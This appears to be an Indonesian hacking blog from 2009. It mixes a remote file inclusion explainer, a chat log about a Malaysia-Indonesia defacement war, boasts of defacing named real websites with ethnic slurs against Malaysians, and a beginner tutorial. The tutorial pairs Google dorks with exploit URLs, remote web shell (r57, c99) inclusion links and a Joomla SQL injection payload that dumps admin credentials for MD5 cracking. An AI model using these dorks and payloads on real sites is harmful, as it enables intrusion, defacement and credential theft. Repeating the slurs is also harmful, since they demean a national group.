1

Hacking with php injection with patching site

Thursday, 26 February 2009
Remote file inclusion dapat diartikan sebagai penyisipan sebuah file dari luar suatu file dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load. Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote file inclusion biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yang rawan terhadap serangan tipe ini.

Dalam artikel ini kita akan lebih banyak membahas bagaimana proses file inclusion (yang selanjutnya kita sebut dengan istilah ‘injeksi’) bisa terjadi dalam bahasa PHP.


° BAGAIMANA BISA TERJADI? :D

———————–

Sebuah serangan file inclusion terjadi didasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri dari:

1. Variabel yang tidak dideklarasikan dengan benar (unsanitized variables)

Variabel dalam PHP mempunyai sintaks:

#1 include ($namavariable. “/file…”)
#2 require_once ($namavariable. /file…)
#3 include_once ($variable. /file…)

Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya terdapat variabel seperti ini:


include($my_ms[”root”].’/error.php’);


Variabel tersebut memiliki kemungkinan untuk disisipi file dari luar webserver dengan eksploit script injeksi PHP:

http://www.target.com/[Script Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?

Diatas adalah contoh eksploitasi MySpeach < = v3.0.2 (my_ms[root])

2. Setting dalam file PHP.ini

#1. register_globals=On
#2. magic_quotes=off
#3. allow_fopenurl=on

° BERBAHAYAKAH?
————-

File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya (Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.

Secara garis besar resiko serangan ini adalah:

1. Web root folder / subdirectory defacing.
2. Previledge escalation (mendapatkan hak akses lebih tinggi).
3. Menjalankan proses dalam server (psyBNC, bots, dsb)
4. Pilfering a.k.a pencurian data (such as credentials information, credit cards, etc..)
5. Dan banyak lagi…!!! Termasuk tindakan pengambilalihan server dan ddos!

° SISTEM OPERASI APA YANG KEBAL?
——————————

Saya teringat permainan C&C Generals (my fave game!) saat seorang hacker keluar dari barak. Mereka mengucapkan “NO SYSTEMS IS SAFE!”. Tepat sekali! Tidak ada sistem operasi yang aman dari serangan injeksi selama mereka menggunakan server side scripting yang dapat dieksploitasi, tak peduli apakah itu Microsoft Windows, LINUX, FreeBSD, Solaris, Darwin OS, dan lain-lainnya.

° APA YANG HARUS DILAKUKAN?
————————-

Banyak sekali portal dan komunitas white hat yang sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yang berarti terhadap CMS yang mungkin sekarang anda gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET /index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga, karena bisa saja ini serangan terhadap web atau portal yang anda kelola.

Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal. Gunakan firewall guna mencegah penyusupan orang-orang yang tidak bertanggung jawab dan memperhatikan port-port server yang sedang terbuka.

° ENDING
——
from : www.webdeessaint.com
8

perang cyber comeback again with malaysia

Wednesday, 25 February 2009
Semalem gw dikirimin hasil chat antara abang gw dengan salah seorang anggota Alien Crew ( Haxor Malayshit). Isinya mereka tidak terima dengan website yg di deface oleh hacker Indonesia dan mereka mengancam akan mendeface 1000 situs Indonesia. Dan mereka akan memulai aksinya itu pada tanggal 20 Februari 2009.

Berikut hasil chatingan nya dengan Alien Crew ( ockgen ) :


ockgen: assalamualaikum wahai sahabt ku

punk_dos: walaikum salam

ockgen: aku dengar kamu banyak hack situs di malaysia..benarkah?

punk_dos: ?

ockgen: benar atau gak?

punk_dos: ??

ockgen: slmat malam.assalamulaikum

punk_dos: maaf anda siapa?

punk_dos: ada perlu apa?

ockgen: ini kali terakhir aku tanya, kamukah yg membuat deface kepada situs2 di malaysia?

punk_dos: anda siapa?

ockgen: Alien crew

punk_dos: lalu?

ockgen: http://www.hackermalaysia.net/

ockgen: saya mahu tanya sahaja

ockgen: btolkan kamu?

punk_dos: apa hak anda bertanya seperti itu terhadap saya?

ockgen: saya mendapat khabar bahawa kamu defacer yg famous di indonesia.

ockgen: yg slalu menggangu situs2 kami

ockgen: saya ingin bertanya

ockgen: kalo kamu tak melakukan gak apa.. kami cuma mahu tahu

punk_dos: lalu?

ockgen: adakah kamu?

punk_dos: silahkan bertanya misterdeessaint@yahoo.com

ockgen: just u and me...aku saja ingin tahu...bukan apa2...sapa itu?

ockgen: aku tanya kamu....adakah kamu hebat?

ockgen: kamu tidak mahu menjawab?

punk_dos: anda telah mengganggu waktu kerja saya, dan membuang gaji kerja saya

ockgen: ok........ bagi tahu kepada bos kamu, mulai 20/02/09, pihak kami akan melakukan cybernatic war dengan negara kami.. sasaran kami kali ini adalah sebanyak 1000 situs. khabarkan kepada bos-bos mu itu. ASSALAMUALAIKUM

punk_dos: anda mengamcam

punk_dos: ?

Ocktula Heepgen: ini untuk kamu.. http://klikpembantu.com/ ...tunggu dan lihat aja pada 20/02/2009, 1000 situs indo akan jadi sasaran.....lo cuma dapat hack website yang bodoh sahaja, yang semua orang dapat tembusi.... kalo lo hebat, lo hack website dibawah jagaan gue, http://www.psmza.edu.my/administrator/ ...joomla bukan sebarang joomla, joomla dikawal oleh gue, kalo lo hebat, ayo tenbusi situs ini..... gue semua cabar hacker indon untuk hack situs ini, tapi, sorang pun tidak dapat masuk...... wait and see... " we got your root"....

punk_dos: gila2


Rupanya si haxor malayshit tidak terima dengan beberapa situs yg di deface hacker Indonesia. Atau mungkin si haxor Malayshit ini berang karena ada situs bikinan dia jadi sasaran deface hacker Indonesia. Tapi sebelum nya Alien Crew telah mendeface ribuan situs Indonesia dan itu yg membuat hacker Indonesia menjadi berang dan mulai membabat situs² malayshit.
Dan perang sampai saat ini masih saja berlangsung tanpa tau kejelasan.....

tapi saya percaya pada hacker indonesia daripada hacker malaysia......

mereka hanya bermulut besar......

tetapi tidak menghasilkan apa" .....

kalo mau tau liat saja forum mereka.....

ini alamat forum hacker negara pencuri (ganyang malaysia )...

http:\\www.hm.org\


0

jalan2 keportugal.....

Tuesday, 17 February 2009
1

Saya berhasil menghajar situs negara pencuri

Monday, 16 February 2009

situs nie memang sangat membuat saya jengkel serta negara tersebut juga....
saya sangat tidak menyukai negara yang mencuri kebudayaan negara lain......
kalo mereka mau y buat sendiri donk kebudayaan jangan bisanya copy paste ja....


lagian bahasa malayshit juga berantakan........
pokoknya bahasa mereka tuh sama kaya bahasa anjing......
bahasa hewan yang gak bisa dimengerti sama sekali....

nie dia webnya:

  • www.malaysiansia.com

  • saya sangat membenci semua situs negara ini.....
    pokoknya samapai akhir saya tetap membenci negara pencuri....

    malayshit setan loe............
    2

    Beberapa situs yang berhasil kena hack ....

    Sunday, 8 February 2009

    nie webnya :
  • http://skrfid.com/


  • hanya dengan menggunakan sistem token.....
    tapi kalo kita pake sistem token ini kita harus sabar.....
    dan jangan gampang menyerah....

    loe ko jadi banyak omong sc....
    oh ya nie hasilnya ...
    cory ya kebanyakan ngoceh... ^_^







    yang dua diatas adlah bekas defacean saya serta halamn admin nya
    nie webnya:http://www.whisperandguapo.com/nuke/index.php

    cory ya kalo dah dipatch
  • 1

    tutoral hacking tuk pemula ^_^

    Level : Pemula :D :$

    Hampir semua para pemula yang pingin hacking web atau deface web, menggunakan jasa layanan
    seacrh engine site google alias mengandalkan dork, xixixixixixi. Pokoknya ada suka dan duka
    disaat pencarian target, xixixixixixi. Sukanya dapat tuh target dan dukanya gak dapat sama
    sekali, wuakakakakakaka, dan tak lupa juga para pemula yang mau belajar hacking, gak lepas
    dari sisi site milw0rm. Disini aku akan melampirkan beberapa teknik hacking web yang masih
    berlaku dan bisa digunakan.



    Hacking pada Ourspace 2.0.9
    ---------------------------
    Awalnya buka milw0rm trus klik search, lalu ketik RFI, FILE atau SQL. Disini kita ambil bug
    http://www.milw0rm.com/exploits/4343. Ok kita dah ambil toh. Sekarang kita akan mencoba

    1. Buka google, trus ketik inurl:"/cgi-bin/ourspace/ pada search enginenya.

    2. Setelah itu cari situs yang mau di hack
    contohnya : http://www.2coolcode.com/cgi-bin/ourspace//login.cgi

    3. Hapus /cgi-bin/ourspace//login.cgi ganti dengan /cgi-bin/ourspace/newswire/uploadmedia.cgi

    4. Setelah itu muncul kalimat upload files

    5. Isi deh atau upload file html anda.




    Hacking Remote File Inclusion
    -----------------------------
    Disini saya akan menguraikan dengan singkat dari teknik hacking RFI.

    1. Buka google trus ketik "Php Blue Dragon" pada search enginenya

    2. Setelah itu cari situs yang mau di hack
    Contohnya : http://www.komix91.ovh.org (site dikiri, da lama aku hack tapi lupa bugnya yang mana, hehehehehehe)
    Ngomong-ngomong karena aku da lupa bug mana tuh, lebih baik kalian cari aja di http://www.milw0rm.com
    Klik search trus ketik PHP BLUE DRAGON. Ini hasil dari serach pada milw0rm.
    - http://milw0rm.com/exploits/1779
    - http://milw0rm.com/exploits/1913
    - http://milw0rm.com/exploits/4276
    Oke, selanjutnya kalian coba aja sendiri ya. Ngomong-ngomong kalau ada kata evil code pada bug situ itu
    maksudnya web shell. Kalau gak ada web shell pake punya aku aja. Itung-itung amal, hehehehehehehe
    - http://www.geocities.com/engel_hacking/r57.txt?
    - http://www.geocities.com/engel_hacking/c99.txt?
    - http://www.geocities.com/engel_hacking/Ekin0x.txt?
    Well, jangan terpengaruh di link web shell aku yang ada kata engel_hacking, aku bukan malaikat hacking, tapi
    ngaku-ngaku malaikat hacking, wuakakakakakakakaka. Padahal gak hebat amat. Cuma Internet Holic doank. Hehehe

    3. Selamat mencoba ya. Semoga sukses.




    Hacking SQL Injection
    ---------------------
    Disini saya akan menguraikan singkat teknik hacking SQL injection. Seperti biasa kita membuka site milw0rm untuk melihat bug SQL
    contoh disini saya mengambil BUG SQL http://www.milw0rm.com/exploits/5177

    1. Buka google trus ketik allinurl:"com_simpleshop" atau allinurl: "com_simpleshop"section disamping kiri ini berupa dork untuk me-
    ncari bug sql pada web.

    2. Singkat penjelasan kalau kita telah mendapatnya sekarang kita injeck. Contoh :
    http://www.target.com/index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section§ion=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*

    3. Kalau ada hasilnya, silakan deskripsi password adminnya menggunakan tools MD5 crack, kalau belum ada silakan download di google.

    4. Selamat Mencoba. Semoga sukses




    Pesan sebelum mencoba : Disini saya hanya menguraikan beberapa teknik hacking yang sering digunakan oleh pemula, seperti yang telah saya jelaskan diatas.
    banyak pemula pingin hacking web atau deface, menggunakan layanan site google dan site milw0rm.
    Kayaknya da cukup penjelasan singkat saya mengenai hacking. Informasi lebih lanjut anda bisa memncari di beberapa sumber yang lebih
    detail membahas tentang hacking. Lagian disini saya hanya menjelaskan dengan singkat and just internet holic.
    " Jangan pernah malu untuk menjadi seorang pemula "

    Thanks To : Moon_Lee | Kamuiclone | Mr.C | Basix | cr4wl3r | bl4ck_3n91n3 | NightProphet | nTc | Chawanua | CyberLog | Cokiki | Funky_Sensey |
    b1beh^pink | Tasya | Mr.Crossbeam | M3G4TR0N | PanTeTo | Doniskynet | d3w0 | GheMax | Exnome | S4NT4 | Atan6 | Don | D'Mack |
    Mitchondiria | Shinci |


    All Newbie Indonesian IT
    ===============================================================================================
    Terimakasih untuk Ea_ngel..

    aku copas untuk belajar bersama2....

    dan tidak ada yang dirubah sedikitpun...